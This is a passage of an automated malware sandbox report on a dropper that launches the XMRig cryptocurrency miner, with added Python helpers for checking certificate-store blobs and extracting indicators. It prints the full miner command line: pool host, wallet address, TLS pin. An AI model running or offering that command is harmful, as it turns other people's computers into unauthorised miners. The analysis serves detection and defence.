memory/4888-23-0x00000158CFBE0000-0x00000158CFC00000-memory.dmp
memory/4888-22-0x00000158CFC00000-0x00000158CFC20000-memory.dmp
memory/4888-24-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-25-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-26-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-27-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-28-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-29-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-30-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-31-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-32-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-33-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-34-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-35-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-36-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-37-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-38-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-39-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-40-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-41-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-42-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-43-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-44-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-45-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-46-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-47-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-48-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-49-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-50-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-51-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-52-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-53-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-54-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-55-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-56-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-57-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-58-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-59-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-60-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-61-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-62-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-63-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-64-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-65-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-66-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-67-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-68-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-69-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-70-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-71-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-72-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-73-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-74-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-75-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-76-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-77-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-78-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-79-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-80-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-81-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
memory/4888-82-0x00007FF7FD320000-0x00007FF7FDE23000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
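The two Blob writes above are the registry form of a certificate being added to the machine's AuthRoot store. Read them with their context before treating the signature as a planted CA: AuthRoot is the store Windows fills on its own from Microsoft's root trust list when chain building reaches a root that is not cached locally yet, so a dropper that has just made HTTPS connections (github.com and objects.githubusercontent.com in the Network table below) commonly produces exactly this signature. An entry written under Root or a user store, or a thumbprint that is not on Microsoft's list, is what would point at a tampered trust store. The Blob value itself is a sequence of CryptoAPI property records (DWORD property id, DWORD reserved set to 1, DWORD length, data); property 3 is the SHA1 hash and property 32 is the DER certificate. The Python below is an added example, not anything from the report or the sandbox: it parses that layout and verifies that the thumbprint in the key name, the stored hash property and the SHA1 of the embedded certificate agree. The blob it runs on is constructed around a placeholder byte string, since the report's Blob contents are not reproduced on this page, so it exercises the parser rather than a real certificate.

```python
"""Parse and sanity-check a SystemCertificates\\<store>\\Certificates\\<thumbprint>\\Blob value.

Added example, not from the report. Record layout: DWORD propid, DWORD reserved (1),
DWORD cbData, then cbData bytes, repeated. Property ids are CryptoAPI's
CERT_SHA1_HASH_PROP_ID (3) and CERT_CERT_PROP_ID (32).
"""
import hashlib
import struct
from typing import Dict, Tuple

CERT_SHA1_HASH_PROP_ID = 3
CERT_CERT_PROP_ID = 32


def parse_blob(blob: bytes) -> Dict[int, bytes]:
    """Split a Blob value into {property id: data}; rejects truncated or malformed records."""
    props: Dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        if reserved != 1:
            raise ValueError(f"reserved field is {reserved}, expected 1, at offset {off}")
        off += 12
        if off + length > len(blob):
            raise ValueError(f"property {prop_id} runs past the end of the blob")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def build_blob(props: Dict[int, bytes]) -> bytes:
    """Inverse of parse_blob; used here only to construct sample data."""
    return b"".join(struct.pack("<III", pid, 1, len(v)) + v for pid, v in props.items())


def split_key(key_path: str) -> Tuple[str, str]:
    """Return (store name, thumbprint) from a ...\\SystemCertificates\\<store>\\Certificates\\<thumbprint> key."""
    parts = key_path.split("\\")
    i = parts.index("Certificates")
    return parts[i - 1], parts[i + 1]


def check_entry(key_path: str, blob: bytes) -> Dict[str, object]:
    """Do the key name, the stored SHA1 property and the embedded certificate agree?"""
    store, thumbprint = split_key(key_path)
    props = parse_blob(blob)
    result: Dict[str, object] = {
        "store": store,
        "key_thumbprint": thumbprint.upper(),
        "cert_sha1": None,
        "stored_sha1": None,
        "consistent": False,
        # AuthRoot is populated by the OS root-list auto-update; Root or a user store is admin/user action.
        "auto_update_store": store == "AuthRoot",
    }
    cert = props.get(CERT_CERT_PROP_ID)
    if cert is None:
        return result
    cert_sha1 = hashlib.sha1(cert).hexdigest().upper()
    stored = props.get(CERT_SHA1_HASH_PROP_ID)
    stored_sha1 = stored.hex().upper() if stored is not None else None
    result["cert_sha1"] = cert_sha1
    result["stored_sha1"] = stored_sha1
    result["consistent"] = cert_sha1 == thumbprint.upper() and stored_sha1 in (None, cert_sha1)
    return result


def sample_entry() -> Tuple[str, bytes]:
    """Constructed AuthRoot entry built around a placeholder body; NOT a real DER certificate."""
    fake_cert = b"\x30\x82" + b"CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-CERTIFICATE"
    thumb = hashlib.sha1(fake_cert).hexdigest().upper()
    key = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\" + thumb
    blob = build_blob({CERT_SHA1_HASH_PROP_ID: bytes.fromhex(thumb), CERT_CERT_PROP_ID: fake_cert})
    return key, blob
```

On a live host the same check runs against the value read from HKLM with `winreg`; a `consistent` result under AuthRoot for a thumbprint that Microsoft's root list carries is the auto-update case, and the certificate bytes in property 32 can be handed to any X.509 parser to confirm the subject.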
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 740 wrote to memory of 4744 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 740 wrote to memory of 4744 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| BE | 2.17.107.131:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
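The xmrig command line in the Processes section (the same one behavioral2 shows above) and the Network table carry the indicators an analyst actually takes away from this detonation. The Python below is an added example, not part of the Triage report: it parses the option names xmrig accepts (-o/--url, -u/--user, -p/--pass, --tls, --tls-fingerprint, --donate-level), checks that the --user value has the shape of a standard Monero address (95 base58 characters starting with 4), records two network properties worth carrying into detection (stratum over TLS on port 80, and a pinned pool certificate that makes the session fail behind a TLS-inspecting proxy, so the tell is repeated handshake failures rather than a clean stream), and correlates the pool host with the TCP destination in the Network rows. The NETWORK list is a subset of the behavioral12 table copied here as constructed input; the finding strings and bucket names are this example's own. The github.com and objects.githubusercontent.com rows get their own bucket because objects.githubusercontent.com serves GitHub release assets, which fits the dropped xmrig-6.21.0\xmrig.exe, although the report does not show the URL that was fetched.

```python
"""IOC extraction for the xmrig command line and Network table above.

Added example, not from the Triage report. Option names are those xmrig accepts
(-o/--url, -u/--user, -p/--pass, --tls, --tls-fingerprint, --donate-level);
finding labels and bucket names are this example's own vocabulary.
"""
from typing import Dict, List, Tuple

# Monero uses the Bitcoin base58 alphabet (no 0, O, I, l); a standard mainnet
# address is 95 characters long and starts with '4'.
XMR_B58 = frozenset("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")
SHORT_OPTS = {"-o": "url", "-u": "user", "-p": "pass"}

# Copied from the report; behavioral2 and behavioral12 show the same command line.
CMDLINE = (
    "xmrig-6.21.0\\xmrig.exe --url pool.hashvault.pro:80 "
    "--user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls "
    "--tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)
# Subset of the behavioral12 Network table (country, destination, domain, proto), constructed input.
NETWORK: List[Tuple[str, str, str, str]] = [
    ("US", "8.8.8.8:53", "g.bing.com", "udp"),
    ("US", "13.107.21.237:443", "g.bing.com", "tcp"),
    ("US", "8.8.8.8:53", "github.com", "udp"),
    ("GB", "20.26.156.215:443", "github.com", "tcp"),
    ("US", "185.199.109.133:443", "objects.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "pool.hashvault.pro", "udp"),
    ("DE", "45.76.89.70:80", "pool.hashvault.pro", "tcp"),
    ("US", "8.8.8.8:53", "70.89.76.45.in-addr.arpa", "udp"),
]


def parse_args(cmdline: str) -> Dict[str, str]:
    """Map xmrig options to values; bare flags such as --tls map to ''."""
    toks = cmdline.split()[1:]  # drop the executable; this sample has no quoted arguments
    out: Dict[str, str] = {}
    i = 0
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("--") and "=" in tok:  # --url=host:port form
            key, val = tok[2:].split("=", 1)
            out[key], i = val, i + 1
            continue
        key = tok[2:] if tok.startswith("--") else SHORT_OPTS.get(tok)
        if key is None:  # stray positional token
            i += 1
            continue
        if i + 1 < len(toks) and not toks[i + 1].startswith("-"):
            out[key], i = toks[i + 1], i + 2
        else:
            out[key], i = "", i + 1
    return out


def is_xmr_standard_address(addr: str) -> bool:
    return len(addr) == 95 and addr.startswith("4") and set(addr) <= XMR_B58


def extract(cmdline: str) -> Dict[str, object]:
    """Structured IOCs plus the findings an analyst should carry into detection."""
    args = parse_args(cmdline)
    url = args.get("url", "").split("://", 1)[-1]  # tolerate stratum+tcp://host:port
    host, _, port = url.rpartition(":")
    wallet = args.get("user", "")
    fp = (args.get("tls-fingerprint") or "").lower() or None
    donate = args.get("donate-level", "")
    ioc: Dict[str, object] = {
        "pool_host": host or url,
        "pool_port": int(port) if port.isdigit() else 0,
        "wallet": wallet,
        "wallet_is_xmr": is_xmr_standard_address(wallet),
        "tls": "tls" in args,
        "tls_fingerprint": fp,
        "donate_level": int(donate) if donate.isdigit() else None,
        "findings": [],
    }
    findings: List[str] = ioc["findings"]  # type: ignore[assignment]
    if ioc["tls"] and ioc["pool_port"] in (80, 8080):
        findings.append("tls-on-http-port")  # TLS ClientHello where proxies and IDS expect plaintext HTTP
    if fp:
        findings.append("pinned-pool-cert")  # SHA-256 pin: a TLS-inspecting proxy breaks the session
    if not ioc["wallet_is_xmr"]:
        findings.append("wallet-not-standard-xmr")
    return ioc


def classify(ioc: Dict[str, object], rows: List[Tuple[str, str, str, str]]) -> Dict[str, list]:
    """Bucket Network rows by what they mean for this sample."""
    buckets: Dict[str, list] = {"pool": [], "github": [], "reverse-dns": [], "other": []}
    for row in rows:
        domain = row[2]
        if domain == ioc["pool_host"]:
            buckets["pool"].append(row)
        elif domain.endswith(".in-addr.arpa"):
            buckets["reverse-dns"].append(row)  # sandbox PTR lookups, not sample behaviour
        elif domain in ("github.com", "objects.githubusercontent.com"):
            buckets["github"].append(row)  # release-asset hosts; fits the dropped xmrig-6.21.0 binary
        else:
            buckets["other"].append(row)
    return buckets


def pool_endpoints(ioc: Dict[str, object], rows: List[Tuple[str, str, str, str]]) -> List[str]:
    """TCP destinations to the pool host on the port from the command line (block these first)."""
    return [d for _, d, dom, p in rows
            if p == "tcp" and dom == ioc["pool_host"] and d.endswith(f":{ioc['pool_port']}")]
```

The findings are the part to keep: a TLS handshake to a pool on port 80 is what a proxy or IDS policy written for HTTP will not expect, and the fingerprint pin means a forward proxy that re-signs TLS will see the miner reconnect and fail rather than mine, which is itself a usable signal.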
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4744-14-0x00000234932D0000-0x00000234932F0000-memory.dmp
memory/4744-15-0x0000023493330000-0x0000023493350000-memory.dmp
memory/4744-16-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-17-0x00000235275C0000-0x00000235275E0000-memory.dmp
memory/4744-18-0x00000235275A0000-0x00000235275C0000-memory.dmp
memory/4744-19-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-20-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-21-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-23-0x00000235275A0000-0x00000235275C0000-memory.dmp
memory/4744-22-0x00000235275C0000-0x00000235275E0000-memory.dmp
memory/4744-24-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-25-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-26-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-27-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-28-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-29-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-30-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-31-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-32-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-33-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-34-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-35-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-36-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-37-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-38-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-39-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-40-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-41-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-42-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-43-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-44-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-45-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-46-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-47-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-48-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-49-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-50-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-51-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-52-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-53-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-54-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-55-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-56-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-57-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-58-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-59-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-60-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-61-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-62-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-63-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-64-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-65-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-66-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-67-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-68-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-69-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-70-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-71-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-72-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-73-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-74-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-75-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-76-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-77-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-78-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-79-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-80-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-81-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
memory/4744-82-0x00007FF6FFD10000-0x00007FF700813000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:43
Platform
win10v2004-20240508-en
Max time kernel
1627s
Max time network
1639s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |